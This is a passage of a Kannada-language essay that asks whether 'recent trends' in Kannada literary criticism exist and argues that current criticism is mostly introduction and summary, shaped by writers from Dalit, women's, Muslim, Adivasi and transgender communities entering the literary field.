ಕನ್ನಡ ಸಾಹಿತ್ಯ ವಿಮರ್ಶೆ ಇತ್ತೀಚೆಗಿನ ಪ್ರವೃತ್ತಿಗಳು

“ಕನ್ನಡ ಸಾಹಿತ್ಯ ವಿಮರ್ಶೆಯಲ್ಲಿ ಇತ್ತೀಚೆಗಿನ ಪ್ರವೃತ್ತಿಗಳು” ಎಂಬುವು ಇವೆಯೇ? ಇದ್ದರೆ ಅವು ಯಾವುವು? ಅದರ ತಾತ್ವಿಕ ಸ್ವರೂಪ ಯಾವುದು? ಅವನ್ನು ಗುರುತಿಸುವ ಹಾಗೂ ಚರ್ಚಿಸುವ ಮಾನದಂಡಗಳು ಯಾವುವು?

ಇತ್ತೀಚೆಗಿನ ಕೆಲವು ವರ್ಷಗಳಲ್ಲಿ “ಕನ್ನಡ ಸಾಹಿತ್ಯದ ಇತ್ತೀಚೆಗಿನ ಒಲವುಗಳು”, “ಕನ್ನಡ ಸಾಹಿತ್ಯದ ಇತ್ತೀಚೆಗಿನ ಪ್ರವೃತ್ತಿಗಳು” ಎಂಬ ಶೀರ್ಷಿಕೆಗಳಲ್ಲಿ ವಿಚಾರ ಸಂಕಿರಣಗಳು ನಡೆಯುತ್ತಿವೆ. ವಿಷಯಗಳ ನಿರ್ದಿಷ್ಟತೆಯ ಚೌಕಟ್ಟಿಗೆ ಬಂದಾಗ, “ಕಾದಂಬರಿಗಳಲ್ಲಿ ಇತ್ತೀಚೆಗಿನ ಒಲವುಗಳು/ ಪ್ರವೃತ್ತಿಗಳು” ಎಂತಲೋ, “ಕನ್ನಡ ಸಣ್ಣ ಕಥೆಗಳಲ್ಲಿ ಇತ್ತೀಚೆಗಿನ ಒಲವುಗಳು/ ಪ್ರವೃತ್ತಿಗಳು” ಎಂತಲೋ ಶೀರ್ಷಿಕೆಗಳನ್ನು ರೂಪಿಸಲಾಗಿರುತ್ತದೆ. ಮುಂದುವರಿದು ಸಾಹಿತ್ಯ ಕುರಿತು ಪಿಎಚ್.ಡಿ. ಅಧ್ಯಯನ ಮಾಡುವವರು ಈ ಮಾದರಿಯ ಶೀರ್ಷಿಕೆಗಳನ್ನು ರೂಪಿಸಿಕೊಳ್ಳುತ್ತಿದ್ದಾರೆ. ಇಲ್ಲಿ ಮೂಲಭೂತವಾದ ಕೆಲವು ಪ್ರಶ್ನೆಗಳನ್ನು ಕೇಳಿಕೊಳ್ಳಬೇಕಾದ ಅಗತ್ಯವಿದೆ ಎಂದು ನಾನು ಭಾವಿಸಿದ್ದೇನೆ.

“ಕನ್ನಡ ಸಾಹಿತ್ಯ ವಿಮರ್ಶೆಯಲ್ಲಿ ಇತ್ತೀಚೆಗಿನ ಪ್ರವೃತ್ತಿಗಳು” ಎಂಬುವು ಇವೆಯೇ? ಇದ್ದರೆ ಅವು ಯಾವುವು? ಅದರ ತಾತ್ವಿಕ ಸ್ವರೂಪ ಯಾವುದು? ಅವನ್ನು ಗುರುತಿಸುವ ಹಾಗೂ ಚರ್ಚಿಸುವ ಮಾನದಂಡಗಳು ಯಾವುವು? ಆ ಪ್ರವೃತ್ತಿಗಳು ಸಾಹಿತ್ಯ ವಿಮರ್ಶೆಯ ಚಿಂತನಾಧಾರೆಗೆ, ಆಲೋಚನಾ ವಿಧಾನಕ್ಕೆ ಸಂಬಂಧಿಸಿದವೋ ಅಥವಾ ಸಾಹಿತ್ಯ ವಿಮರ್ಶೆಯ ವಸ್ತು ವಿಷಯಗಳಿಗೆ ಸಂಬಂಧಿಸಿದವೋ ಎಂಬ ಪ್ರಶ್ನೆಗಳು ಮುಖ್ಯವಾಗುತ್ತವೆ. ಇತ್ತೀಚಿನ ಪ್ರವೃತ್ತಿಗಳು ಚಿಂತನಾಧಾರೆಗೆ/ ಆಲೋಚನಾ ವಿಧಾನಕ್ಕೆ ಸಂಬಂಧಿದ್ದರೆ ಅವುಗಳಲ್ಲಿ ನಡೆದಿರಬಹುದಾದ ಮುಖ್ಯ ಪಲ್ಲಟಗಳು ಯಾವುವು, ಇತ್ತೀಚಿನ ಪ್ರವೃತ್ತಿಗಳು ಸಾಹಿತ್ಯ ವಿಮರ್ಶೆಯ ವಸ್ತುವಿಗೆ ಸಂಬಂಧಪಟ್ಟಿದ್ದರೆ ಆ ವಸ್ತುಗಳು ಯಾವುವು ಎಂಬ ಚರ್ಚೆಗೆ ಒಂದು ವೈಚಾರಿಕ ಭಿತ್ತಿಯನ್ನು ಇದು ನಿರ್ಮಾಣ ಮಾಡುತ್ತದೆ.

ಈ ಚರ್ಚೆಗೆ ಹೋಗುವ ಮೊದಲು ಕನ್ನಡ ಸಾಹಿತ್ಯ ವಿಮರ್ಶೆಯ ತಿರುಳಿನ ಬಗೆಗೆ ಕೆಲವು ಮಾತುಗಳನ್ನು ಹೇಳವುದಿದೆ. ಕನ್ನಡ ಸಾಹಿತ್ಯ ವಿಮರ್ಶೆ ಎಂದರೆ ಅದು ಬಹುತೇಕ ಲಿಖಿತ ಸಾಹಿತ್ಯ ಕೃತಿಗಳ ಜೊತೆಯಲ್ಲಿ ನಡೆಸಿರುವ ಅನುಸಂಧಾನವಾಗಿದೆ. ಇದು ಕನ್ನಡದ ಮೌಖಿಕ ಪಠ್ಯಗಳ ಬಗೆಗೆ ಹೆಚ್ಚು ಅನುಸಂಧಾನ ಮಾಡಿಲ್ಲ. ಇದರ ಚರ್ಚೆಗೆ ಇಲ್ಲಿ ಅವಕಾಶ ಕಡಿಮೆ ಇದೆ. ಕನ್ನಡ ಸಾಹಿತ್ಯ ವಿಮರ್ಶೆಯು ಕನ್ನಡದ ಲಿಖಿತ ಪಠ್ಯಗಳೊಂದಿಗೆ ನಡೆಸಿರುವ ಅನುಸಂಧಾನದ ಸ್ವರೂಪವನ್ನು ಮುಖ್ಯವಾಗಿ 6 ರೀತಿಯಲ್ಲಿ ಗುರುತಿಸಬಹುದು. ಕನ್ನಡ ಸಾಹಿತ್ಯ ವಿಮರ್ಶೆಯು ಸಾಹಿತ್ಯ ಕೃತಿಗಳನ್ನು (1) ಪರಿಚಯಿಸಿದೆ, (2) ವಿವರಿಸಿದೆ, (3) ಸಾರಾಂಶೀಕರಿಸಿದೆ, (4) ವಿಶ್ಲೇಷಿಸಿದೆ, (5) ವ್ಯಾಖ್ಯಾನಿಸಿದೆ ಮತ್ತು (6) ಮೌಲ್ಯಮಾಪನ ಮಾಡಿದೆ.

ಸಾಹಿತ್ಯ ವಿಮರ್ಶೆಯಲ್ಲಿ ಇದರ ಪ್ರಮಾಣವನ್ನು ಗಮನಿಸಿದರೆ, ಸಾಹಿತ್ಯ ಕೃತಿಗಳ ಪರಿಚಯದ ಬರವಣಿಗೆ ದೊಡ್ಡ ಪ್ರಮಾಣದಲ್ಲಿದೆ. ಎರಡನೇ ದೊಡ್ಡ ಪ್ರಮಾಣ ಎಂದರೆ ಸಾಹಿತ್ಯ ಕೃತಿಗಳ ವಿವರಣೆ ಮತ್ತು ಸಾರಾಂಶ. ವಿಶ್ಲೇಷಣಾತ್ಮಕ ಬರವಣಿಗೆ ಸ್ವಲ್ಪ ಪ್ರಮಾಣದಲ್ಲಿದೆ. ಇನ್ನು ವ್ಯಾಖ್ಯಾನಾತ್ಮಕ ವಿಮರ್ಶೆ ಪ್ರಮಾಣದಲ್ಲಿ ಬಹಳ ಕಡಿಮೆ ಇದೆ. ಕೆಲವು ಓದುಗರು ಈ ಬರವಣಿಗೆ ಅರ್ಥ ಆಗುವುದಿಲ್ಲ ಎಂದು ಅದನ್ನು ಓದುವ/ ಅಧ್ಯಯನ ಮಾಡುವ ಗೋಜಿಗೆ ಹೋಗಿಲ್ಲ. ಇನ್ನು ಮೌಲ್ಯಮಾಪನದ ವಿಮರ್ಶಾ ಬರವಣಿಗೆ ಈ ಎಲ್ಲಾ ಸ್ವರೂಪದ ಬರವಣಿಗೆಯಲ್ಲೂ ಇದೆ.

ಸಾಹಿತ್ಯ ವಿಮರ್ಶೆಯು ಕೆಲವು ಸಲ ಅತ್ಯಂತ ದುರ್ಬಲ ಕೃತಿಗಳನ್ನು ಮತ್ತು ಕೃತಿಕಾರರನ್ನು ಎತ್ತಿ ಹಿಡಿದಿದೆ; ಇನ್ನು ಕೆಲವು ಸಲ ಮಹತ್ವದ ಕೃತಿಗಳನ್ನು/ ಕೃತಿಕಾರರನ್ನು ಕಣ್ಣೆತ್ತಿಯೂ ನೋಡದೆ ಅವನ್ನು ನಿರ್ದಾಕ್ಷಿಣ್ಯವಾಗಿ ನಿರ್ಲಕ್ಷಿಸಿದೆ. ಸಾಹಿತ್ಯ ವಿಮರ್ಶೆಯಲ್ಲಿ ಪಕ್ಷಪಾತ ಹಿತಾಸಕ್ತಿ ಮತ್ತು ತಾರತಮ್ಯದ ಧೋರಣೆ ನಿರಂತರವಾಗಿ ಕೆಲಸ ಮಾಡುತ್ತಾ ಬಂದಿದೆ. ಯಾವುದೇ ಪೂರ್ವಾಗ್ರಹ ಇಲ್ಲದೆ ಈ ಹೇಳಿಕೆಯನ್ನು ಹೇಳಬಹುದಾಗಿದ್ದು, ಇದನ್ನು “ಕನ್ನಡ ಸಾಹಿತ್ಯ ವಿಮರ್ಶೆಯ ವೈಚಾರಿಕ ರೋಗ” ಎಂದು ಹೊಸದಾಗಿ ನಾಮಕರಣ ಮಾಡಬಹುದು. ಕನ್ನಡ ಸಾಹಿತ್ಯ ವಿಮರ್ಶೆಯನ್ನು ಸೂಕ್ಷ್ಮವಾಗಿ ಬಲ್ಲವರಿಗೆ ಇದಕ್ಕೆ ಉದಾಹರಣೆ ಕೊಡುವ ಇಲ್ಲವೆ ಸಾಕ್ಷಿ ಒದಗಿಸುವ ಅಗತ್ಯ ಇಲ್ಲ ಎಂದು ಭಾವಿಸುತ್ತೇನೆ. ಈ ಚೌಕಟ್ಟಿನ ಚರ್ಚೆಯನ್ನು ಇನ್ನೂ ಮುಂದುವರಿಸಲು ಸಾಧ್ಯವಿದೆ.

ಒಂದು ಕಡೆ ಕನ್ನಡ ಸಾಹಿತ್ಯ ವಿಮರ್ಶೆಗೆ ಈ ಬಗೆಯ ತಾತ್ವಿಕ ಹಿತಾಸಕ್ತಿಯ ಮಿತಿ ಇದ್ದರೆ, ಇನ್ನೊಂದು ಕಡೆ ಇದು ಕನ್ನಡ ವೈಚಾರಿಕ ಚಿಂತನೆಗೆ ಅಪಾರವಾದುದನ್ನು ಕೊಟ್ಟಿದೆ ಎಂಬುದನ್ನು ಮರೆಯುವಂತಿಲ್ಲ. ಸಾಹಿತ್ಯ ವಿಮರ್ಶೆ ಜಗತ್ತಿನ ಬೇರೆ ಬೇರೆ ಜ್ಞಾನಶಿಸ್ತುಗಳನ್ನು, ಚಿಂತನಾಧಾರೆಗಳನ್ನು ಮತ್ತು ಸಿದ್ಧಾಂತಗಳನ್ನು ಕನ್ನಡ ಚಿಂತನೆಗೆ ಹೊಸದಾಗಿ ಸೇರ್ಪಡೆ ಮಾಡಿದೆ. ಮನೋವಿಶ್ಲೇಷಣೆ, ಮಹಿಳಾ ಚಿಂತನೆ, ಚಾರಿತ್ರಿಕ ಓದು, ಅಸ್ತಿತ್ವವಾದ, ವಾಸ್ತವತಾವಾದ, ಮಾಕ್ರ್ಸ್‍ವಾದ, ಪರಂಪರೆಯನ್ನು ಕುರಿತ ಚಿಂತನೆ, ಸಂಸ್ಕೃತಿ ಕುರಿತ ಚಿಂತನೆ, ಜಾಗತೀಕರಣ ಇವೇ ಮುಂತಾದ ಚಿಂತನಾಧಾರೆಗಳನ್ನು ಹಾಗೂ ಸಿದ್ಧಾಂತಗಳನ್ನು ಕನ್ನಡ ಚಿಂತನೆಗೆ ಪರಿಚಯಿಸಿದೆ.

“ಸಾಹಿತ್ಯ ವಿಮರ್ಶೆಯ ಇತ್ತೀಚೆಗಿನ ಪ್ರವೃತ್ತಿಗಳು” ಎನ್ನುವಾಗ, ಸಾಹಿತ್ಯ ವಿಮರ್ಶೆಯ ಸಾಮಾನ್ಯ ಸ್ವರೂಪ ಯಾವುದು ಎಂಬ ಪ್ರಶ್ನೆ ಸಹಜವಾಗಿ ಬರುತ್ತದೆ. ಸಾಹಿತ್ಯ ಪಠ್ಯ ಎಂದು ಕರೆಯಲಾಗುವ ಸಾಹಿತ್ಯ, ಸಂಸ್ಕೃತಿ, ಭಾಷೆ, ಸಮುದಾಯ, ಸಮಾಜ, ಪರಂಪರೆ, ಚರಿತ್ರೆ, ಲಿಂಗ, ಜಾತಿ, ಪ್ರಭುತ್ವ ಮುಂತಾದುವನ್ನು ಓದುವುದು, ಗ್ರಹಿಸುವುದು, ಅರ್ಥಮಾಡಿಕೊಳ್ಳುವುದು, ಪರಿಚಯಿಸುವುದು, ವಿವರಿಸುವುದು, ಸಾರಾಂಶೀಕರಿಸುವುದು, ವಿಶ್ಲೇಷಿಸುವುದು, ವ್ಯಾಖ್ಯಾನಿಸುವುದು, ಮೌಲ್ಯಮಾಪನ ಮಾಡುವುದು ಎಂದು ಸ್ಥೂಲವಾಗಿ ಒಂದು ಚೌಕಟ್ಟನ್ನು ಹಾಕಬಹುದು. ಸಾಹಿತ್ಯ ಪಠ್ಯವೊಂದನ್ನು ಓದುವಾಗ ಮೇಲಿನ ಹೇಳಿಕೆಯಲ್ಲಿ ಸೂಚಿಸಿದ ಅಷ್ಟೂ ಸಂಗತಿಗಳನ್ನು ಒಟ್ಟಾಗಿ-ಸಮಗ್ರವಾಗಿ ಗ್ರಹಿಸಲಾಗಿರುತ್ತದೆಯೋ ಎಂಬ ಪ್ರಶ್ನೆಯೂ ಬರುತ್ತದೆ. ಇದು ವಿಮರ್ಶಕರ ಬೌದ್ಧಿಕ ಸಾಮಥ್ರ್ಯ ಮತ್ತು ಅವರ ಧೋರಣೆಯನ್ನು ಅವಲಂಬಿಸಿರುತ್ತದೆ. ಹಾಗಾಗಿ ಎಲ್ಲಾ ವಿಮರ್ಶೆಯ ಬರವಣಿಗೆಯೂ ಇವೆಲ್ಲವನ್ನೂ ಒಳಗೊಂಡಿರುತ್ತದೆ ಎನ್ನಲು ಬರುವುದಿಲ್ಲ.

ಸಾಹಿತ್ಯ ವಿಮರ್ಶೆಯು ಪ್ರಾಥಮಿಕವಾಗಿ ಸಾಹಿತ್ಯ ಕೃತಿಯನ್ನು ಓದುವುದರ ಮೂಲಕ ಶುರುವಾಗುತ್ತದೆ. ಓದುವುದು ಎಂದರೆ ಇದಕ್ಕೆ ಅಕ್ಷರರೂಪದ ಸಂಕೇತಗಳು ಇರಬಹುದು; ಇಲ್ಲದೆಯೂ ಇರಬಹುದು. ಓದುವ ಪಠ್ಯದ ಸ್ವರೂಪ ಮತ್ತು ಓದುವವರ ಧೋರಣೆ ಹಾಗೂ ಹಿತಾಸಕ್ತಿಗೆ ಅನುಗುಣವಾಗಿ ಇದು ಬದಲಾಗುತ್ತಾ ಹೋಗುತ್ತದೆ. ಪ್ರತಿ ಓದಿನಲ್ಲೂ ಅರ್ಥ, ಗ್ರಹಿಕೆ, ಪರಿಚಯ, ವಿವರಣೆ, ಸಾರಾಂಶ, ವಿಶ್ಲೇಷಣೆ, ವ್ಯಾಖ್ಯಾನ ಮೌಲ್ಯಮಾಪನ -ಇವು ಸೃಷ್ಟಿಯಾಗುತ್ತಾ, ಉತ್ಪಾದನೆ ಆಗುತ್ತಾ ಹೋಗುತ್ತವೆ. ಹಾಗಾಗಿಯೇ ಒಂದು ಪಠ್ಯವನ್ನು ಒಂದೇ ಕಾಲದಲ್ಲಿ ಎಲ್ಲರೂ ಓದಿದಾಗ ಒಂದೇ ಅರ್ಥ-ವಿವರಣೆ-ವ್ಯಾಖ್ಯಾನಗಳು ಉತ್ಪಾದನೆ ಆಗುವುದಿಲ್ಲ. ಇದರ ಹಾಗೆಯೇ ಒಬ್ಬ ಓದುಗ/ವಿಮರ್ಶಕ ಒಂದು ಪಠ್ಯವನ್ನು ಬೇರೆ ಬೇರೆ ಉದ್ದೇಶಗಳಿಗೆ ಹಾಗೂ ಬೇರೆ ಬೇರೆ ಕಾಲ-ಸಂದರ್ಭಗಳಲ್ಲಿ ಓದಿದಾಗ ಒಂದೇ ಅರ್ಥ-ವಿವರಣೆ-ವ್ಯಾಖ್ಯಾನಗಳು ಉತ್ಪಾದನೆ ಆಗುವುದಿಲ್ಲ. ಇದು ಸಾಹಿತ್ಯ ವಿಮರ್ಶೆಯ ಬೌದ್ಧಿಕ ಮತ್ತು ವೈಚಾರಿಕ ಕೆಲಸದ ಸಾಮಾನ್ಯ ಸ್ವರೂಪ ಮತ್ತು ಸ್ವಭಾವ.

ಇದಲ್ಲದೆ ಇನ್ನೊಂದು ಬಗೆಯಲ್ಲೂ ಸಾಹಿತ್ಯ ವಿಮರ್ಶೆಯ ಬೌದ್ಧಿಕ ಕೆಲಸವನ್ನು ವಿವರಿಸಿಕೊಳ್ಳಬಹುದು. ಸಾಹಿತ್ಯ ಪಠ್ಯಗಳೊಂದಿಗೆ ಇಲ್ಲವೆ ಸಾಹಿತ್ಯ ಸಂಸ್ಕೃತಿಯೊಂದಿಗೆ ಅನುಸಂಧಾನ ಮಾಡುವುದು, ಸಂವಾದ ಮಾಡುವುದು, ಮುಖಾಮುಖಿ ಮಾಡುವುದು ಮತ್ತು ಮುಖವಾಣಿ ಆಗುವುದು. ಈ ನಾಲ್ಕು ಬಗೆಯ ವೈಚಾರಿಕ/ಬೌದ್ಧಿಕ ಕೆಲಸಗಳು ಅರ್ಥ, ಪರಿಚಯ, ವಿವರಣೆ, ಸಾರಾಂಶ, ವಿಶ್ಲೇಷಣೆ, ವ್ಯಾಖ್ಯಾನ ಹಾಗೂ ಮೌಲ್ಯಮಾಪನ ಇವುಗಳಲ್ಲಿ ಯಾವುದಾದರೂ ಒಂದನ್ನು ಒಳಗೊಂಡಿರಬಹುದು. ಅಥವಾ ಒಂದಕ್ಕಿಂತ ಹೆಚ್ಚು ನೆಲೆಗಳನ್ನು ಒಳಗೊಂಡಿರಬಹುದು. ಸಾಹಿತ್ಯ ವಿಮರ್ಶೆಯ ಈ ಮೂಲಭೂತ ತಾತ್ವಿಕ ಸ್ವರೂಪ ಮತ್ತು ಸ್ವಭಾವದಲ್ಲಿ “ಇತ್ತೀಚೆಗಿನ ಪ್ರವೃತ್ತಿಗಳು” ಎಂಬುವು ಇರುವುದಿಲ್ಲ ಅಥವಾ ಆಗುವುದಿಲ್ಲ. ಯಾಕೆಂದರೆ ಸಾಹಿತ್ಯ ಪಠ್ಯಗಳೊಂದಿಗೆ ನಡೆಸುವ ಈ ಬಗೆಯ ಬೌದ್ಧಿಕ ಸಂವಾದ ಎಲ್ಲಾ ಕಾಲದಲ್ಲೂ ಇರುವಂತಹದ್ದೇ ಆಗಿದೆ. ಹಾಗಾಗಿ ಸಾಹಿತ್ಯ ವಿಮರ್ಶೆಯಲ್ಲಿ ಇತ್ತೀಚೆಗಿನ ಪ್ರವೃತ್ತಿ ಎಂಬುದು ಸಾಧ್ಯವಿಲ್ಲ.

ಹಾಗಿದ್ದರೆ ಸಾಹಿತ್ಯ ವಿಮರ್ಶೆಯ ಇತ್ತೀಚೆಗಿನ ಪ್ರವೃತ್ತಿಗಳ ಸಾಮಾನ್ಯ ಸ್ವರೂಪ ಯಾವುದು? ಸಾಹಿತ್ಯ ವಿಮರ್ಶೆಯಲ್ಲಿ ಇತ್ತೀಚೆಗೆ ವಿಶ್ಲೇಷಣಾತ್ಮಕ ಹಾಗೂ ವ್ಯಾಖ್ಯಾನಾತ್ಮಕ ಪ್ರವೃತ್ತಿಗಳು ಕಾಣುತ್ತಿಲ್ಲ. ಬದಲಿಗೆ ಪರಿಚಯ-ವಿವರಣೆ ಮತ್ತು ಸಾರಾಂಶದ ನೆಲೆಗಳು ಹೆಚ್ಚಾಗಿ ಕಾಣುತ್ತಿವೆ. ಅಥವಾ ಇದೇ ಇಂದಿನ ಸಾಹಿತ್ಯ ವಿಮರ್ಶೆಯ ಮುಖ್ಯ ಬಂಡವಾಳ ಆಗಿದೆ. ಈ ಕೆಲಸ ಎಲ್ಲಿಲ್ಲೆ ನಡೆಯುತ್ತಿದೆ ಎಂಬುದರ ಒಂದು ಇಣುಕು ನೋಟವನ್ನು ಗಮನಿಸಬಹುದು. ಸಾಹಿತ್ಯ ಕೃತಿಗಳಿಗೆ ಬರೆಯುವ ಮುನ್ನುಡಿಗಳಲ್ಲಿ, ತರಗತಿಗಳ ಪಾಠಗಳಲ್ಲಿ, ಸಾಹಿತ್ಯದ ತರಬೇತಿಗಳಲ್ಲಿ, ಸಾಹಿತ್ಯ ಕುರಿತ ಸೆಮಿನಾರುಗಳಲ್ಲಿ, ವಿಮರ್ಶಾ ಕಮ್ಮಟಗಳಲ್ಲಿ, ಸಾಹಿತ್ಯ ಸಮ್ಮೇಳನಗಳಲ್ಲಿ, ವಿವಿಧ ಪತ್ರಿಕೆಗಳಲ್ಲಿ ಪ್ರಕಟವಾಗುವ ಸಾಹಿತ್ಯ ಕೃತಿಗಳನ್ನು ಕುರಿತ ಬರವಣಿಗೆಗಳಲ್ಲಿ, ಅಭಿನಂದನ ಗ್ರಂಥಗಳಿಗೆ ಬರೆಯುವ ಲೇಖನಗಳಲ್ಲಿ, ಎಂ.ಫಿಲ್., ಪಿಎಚ್.ಡಿ., ಡಿ.ಲಿಟ್. ಮುಂತಾದ ಸಂಶೋಧನಾ ಚಟುವಟಿಕೆಗಳಲ್ಲಿ. ಇಲ್ಲೆಲ್ಲ ಸಾಹಿತ್ಯ ಕೃತಿಗಳ ಬಗೆಗೆ ಮತ್ತು ಅವನ್ನು ಬರೆದವರ ಬಗೆಗೆ ಪರಿಚಯ ಹಾಗೂ ಸಾರಾಂಶಗಳನ್ನು ಉತ್ಪಾದನೆ ಮಾಡಲಾಗುತ್ತಿದೆ. ಇದನ್ನೇ ಸಧ್ಯ “ಸಾಹಿತ್ಯ ವಿಮರ್ಶೆ” ಎಂದು ಬಿಂಬಿಸಲಾಗುತ್ತಿದೆ. ಈ ಬಗೆಯ ಸಾಹಿತ್ಯ ಓದನ್ನು “ಸಾಹಿತ್ಯದ ಸಾಮಾನ್ಯ ಓದು” ಎಂದು ಕರೆಯಬಹುದು.

ಸಾಹಿತ್ಯ ಕೃತಿಗಳ ಪರಿಚಯ ಮತ್ತು ಸಾರಾಂಶವೇ ಮುಖ್ಯ ಬಂಡವಾಳ ಆಗಿರುವ ಈ ಬೌದ್ಧಿಕ ಕೆಲಸದಲ್ಲಿ ಅದರ ಕಾಳಜಿಯ ನೆಲೆಗಳು ಸಮಾಜದ ಬೇರೆ ಬೇರೆ ಆಯಾಮಗಳನ್ನು ಪಡೆಯುತ್ತಿವೆ. ತಳಸಮುದಾಯಗಳ ಐಡೆಂಟಿಟಿಯ ನೆಲೆ, (ಇದರಲ್ಲಿ ಸಾಂಸ್ಕೃತಿಕ, ಪೌರಾಣಿಕ ಹಾಗೂ ಚಾರಿತ್ರಿಕ ಆಯಾಮಗಳು ಇವೆ) ಲಿಂಗ ತಾರತಮ್ಯದ ನೆಲೆ, ದಲಿತ ನೆಲೆ, ಸ್ಥಳೀಯತೆ, ಪ್ರಾದೇಶಿಕತೆ ಆಯಾಮಗಳ ಓದುಗಳು ನಡೆಯುತ್ತಿವೆ. ಬಾಬಾ ಸಾಹೇಬ್ ಅಂಬೇಡ್ಕರ್ ಅವರ ಆಶಯಗಳೊಂದಿಗಿನ ಓದುವುದು, ಪ್ರತಿರೋಧದ ಆಶಯಗಳೊಂದಿಗೆ ಓದುವುದು ಈ ಮುಂತಾದ ಸಾಹಿತ್ಯಕ ಓದುಗಳನ್ನು ಕಾಣಬಹುದು.

ಇಂತಹ ಓದುಗಳಿಗೆ ಮುಖ್ಯ ಕಾರಣ ಸಾಹಿತ್ಯಕ ವಲಯದಲ್ಲಿ ಮಾತ್ರ ಇಲ್ಲ. ಅಥವಾ ಇಂತಹ ಓದುಗಳು ಕೇವಲ ಸಾಹಿತ್ಯ ಸಂಸ್ಕೃತಿಯ ಜಗತ್ತಿನಿಂದ ಉತ್ಪಾದನೆ ಆಗುತ್ತಿಲ್ಲ. ಇತ್ತೀಚೆಗೆ ಸಮಾಜದ ಬೇರೆ ಬೇರೆ ಸಮುದಾಯದವರು, ಬೇರೆ ಬೇರೆ ಸಮೂಹದವರು ಸಾಹಿತ್ಯಸಂಸ್ಕೃತಿ ಕ್ಷೇತ್ರವನ್ನು ಪ್ರವೇಶ ಮಾಡಿದ್ದಾರೆ; ಮಾಡುತ್ತಿದ್ದಾರೆ. ಒಂದು ಕಾಲದಲ್ಲಿ ಊಹೆಯನ್ನೂ ಮಾಡಲಾಗದ ಸಮುದಾಯ/ಸಮೂಹದವರು ಈ ಕ್ಷೇತ್ರದಲ್ಲಿ ಕೆಲಸ ಮಾಡುತ್ತಿದ್ದಾರೆ. ದಲಿತರು, ಮಹಿಳೆಯರು, ಮುಸ್ಲಿಮರು, ಆದಿವಾಸಿ ಬುಡಕಟ್ಟು ಸಮುದಾಯದವರು, ಮಂಗಳಮುಖಿಯರು ಹೀಗೆ ಇದನ್ನು ನಮೂದಿಸಲು ಸಾಧ್ಯವಿದೆ.

ಇಂತಹ ಸಮುದಾಯ/ಸಮೂಹದವರು ಅನಕ್ಷರಸ್ಥ ಕುಟುಂಬಗಳಿಂದ ಬಂದವರು. ಮೊದಲ ತಲೆಮಾರಿನಲ್ಲಿ ಅಕ್ಷರ ಶಿಕ್ಷಣ ಪಡೆದ ಈ ಸಮುದಾಯದವರು ಸಾಹಿತ್ಯ ರಚನೆ ಮಾಡುತ್ತಿದ್ದಾರೆ. ಇವರಲ್ಲೆ ಕೆಲವರು ಸಾಹಿತ್ಯ ಪಾಠ ಮಾಡುವುದು, ಸಾಹಿತ್ಯವನ್ನು ಕುರಿತು ಮಾತಾಡುವುದು, ಬರೆಯುವುದು ಇತ್ಯಾದಿ ಮಾಡುತ್ತಿದ್ದಾರೆ. ಇವರೆಲ್ಲರೂ ಶುದ್ಧ ಸಾಹಿತ್ಯ ವಿಮರ್ಶೆಯ ಸಿದ್ಧಾಂತಗಳನ್ನು ಓದಿ ಕರಗತ ಮಾಡಿಕೊಂಡ ಪಂಡಿತರಲ್ಲ. ಮತ್ತು ಸಾಹಿತ್ಯ ವಿಮರ್ಶೆಯು ಇವರ ಆಯ್ಕೆಯೂ ಅಲ್ಲ; ವೃತ್ತಿಯೂ ಅಲ್ಲ. ಸಾಹಿತ್ಯಸಂಸ್ಕೃತಿಯ ಚಟುವಟಿಕೆಯ ಒಂದು ಭಾಗವಾಗಿ ಇದನ್ನು ಮಾಡುತ್ತಿದ್ದಾರೆ ಅಷ್ಟೆ.

ಹಾಗೆ ನೋಡಿದರೆ, ಈ ತಲೆಮಾರು “ಸಾಹಿತ್ಯಕ ಪಾಂಡಿತ್ಯ”ಕ್ಕೆ ಧಿಕ್ಕಾರ ಹಾಕಿ, ಅದಕ್ಕೆ ಸೆಡ್ಡು ಹೊಡೆದು ನಿಂತಿದೆ. ಸೆಡ್ಡು ಹೊಡೆದು ನಿಂತಿರುವ ಈ ವಸ್ತುಸ್ಥಿತಿ ಇವರ ಸಂಘಟನಾತ್ಮಕ ಯೋಜನೆಯ ಫಲದಿಂದ ಹುಟ್ಟಿದ್ದಲ್ಲ. ಬದಲಾಗುತ್ತಿರುವ ಸಾಮಾಜಿಕ ವಸ್ತುಸ್ಥಿತಿಯೇ ಇಂತಹ ಸನ್ನಿವೇಶವನ್ನು ನಿರ್ಮಾಣ ಮಾಡಿದೆ. ಈ ಸಾಮಾಜಿಕ ಚಲನಶೀಲತೆಯ ಅರಿವಿನ ಗೈರುಹಾಜರಿಯಲ್ಲಿ “ಕನ್ನಡ ಸಾಹಿತ್ಯ ವಿಮರ್ಶೆ ಸೊರಗಿದೆ”, “ಕನ್ನಡ ಸಾಹಿತ್ಯ ವಿಮರ್ಶೆ ನಿಂತುಹೋಗಿದೆ”, “ಕನ್ನಡ ಸಾಹಿತ್ಯ ವಿಮರ್ಶೆ ಮಹತ್ವದನ್ನು ಕೊಡುತ್ತಿಲ್ಲ” ಎಂಬ ಹೇಳಿಕೆಗಳನ್ನು ಕೊಡಲಾಗುತ್ತಿದೆ. ಈ ಹೇಳಿಕೆ ಕೊಡುತ್ತಿರುವವರು ಯಾವ ಗುಣಮಟ್ಟದ/ ಯಾವ ಧೋರಣೆಯ/ ಯಾವ ತಾತ್ವಿಕತೆಯ ಸಾಹಿತ್ಯ ವಿಮರ್ಶೆಯನ್ನು ಬಯಸುತ್ತಿದ್ದಾರೆ ಎಂಬುದು ಸ್ಪಷ್ಟವಾಗುತ್ತಿಲ್ಲ.

ಕನ್ನಡ ಸಾಹಿತ್ಯ ವಿಮರ್ಶೆಯಲ್ಲಿ ಸಾಹಿತ್ಯ ಕೃತಿಗಳನ್ನು ಕುರಿತ ಪರಿಚಯಾತ್ಮಕ ಬರವಣಿಗೆ ಬಹಳ ದೊಡ್ಡ ಪ್ರಮಾಣದಲ್ಲಿದೆ. ಇದು ಈಗ ಮಾತ್ರ ಬರುತ್ತಿರುವ ಬರವಣಿಗೆ ಅಲ್ಲ. ಕನ್ನಡ ಸಾಹಿತ್ಯ ವಿಮರ್ಶೆಯ ಆರಂಭದಲ್ಲೆ ಈ ಸ್ವರೂಪದ ಬರವಣಿಗೆ ಬಂದಿದೆ. ಇಂತಹ ವಿಮರ್ಶೆಯನ್ನು ಮೇಲುಜಾತಿಯ ಬರಹಗಾರರು, ಶೈಕ್ಷಣಿಕ ಹಿನ್ನೆಲೆಯಿಂದ ಬಂದವರು ಮತ್ತು ಇಂಗ್ಲಿಶ್ ಸಾಹಿತ್ಯ ವಿಮರ್ಶೆಯನ್ನು ಓದಿಕೊಂಡವರು 